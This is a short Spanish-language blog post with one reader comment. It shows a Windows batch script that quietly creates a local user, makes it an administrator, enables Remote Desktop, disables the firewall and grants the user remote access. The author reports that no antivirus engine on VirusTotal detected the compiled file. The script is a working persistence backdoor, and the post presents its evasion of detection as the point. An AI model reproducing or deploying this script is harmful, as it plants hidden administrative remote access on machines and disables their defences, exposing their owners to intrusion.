Que si detección por firmas, que si analisis heuristicos que si papatim que si papatam, que si creo un fichero bat con comandos net resulta que los antivirus no dicen ni pio.
Esta prueba la realize con comandos que nos proporciona el propio windows en resumen por quien no este acostumbrado, al principio nos creara un usuario, seguidamente se agregarà al grupo administradores de la maquina, habilitara el acceso remoto, desactivarà el firewal de windows y agregara el usuario al acceso remoto.
@echo off
Net user PROVA /ADD
net localgroup ADMINISTRADORES PROVA /ADD
reg add "hklm\system\currentcontrolset\control\terminal server" /v fDenyTSConnections /t REG_DWORD /f /d 0
netsh firewall set opmode mode=DISABLE profile=DOMAIN
NET LOCALGROUP "Usuarios de escritorio Remoto" PROVA /ADD"
La comprobación la realicé subiendo el fichero compilado a www.virustotal.com
donde te realiza un analisos mediante bastantes motores de antivirus. ninguno de ello s lo detectó !LOGICO son comandos net! PELIGROSO !Pos tus diras, no se a mi me lo parece!
Ahí queda eso.
Quasi
Suscribirse a:
Enviar comentarios (Atom)
1 comentario:
Sobrado el comment, aunque a mi el que me da miedo eres tu ;)
Un abrazo y sigue posteando cosas chulas pa que yo aprenda algo.
Publicar un comentario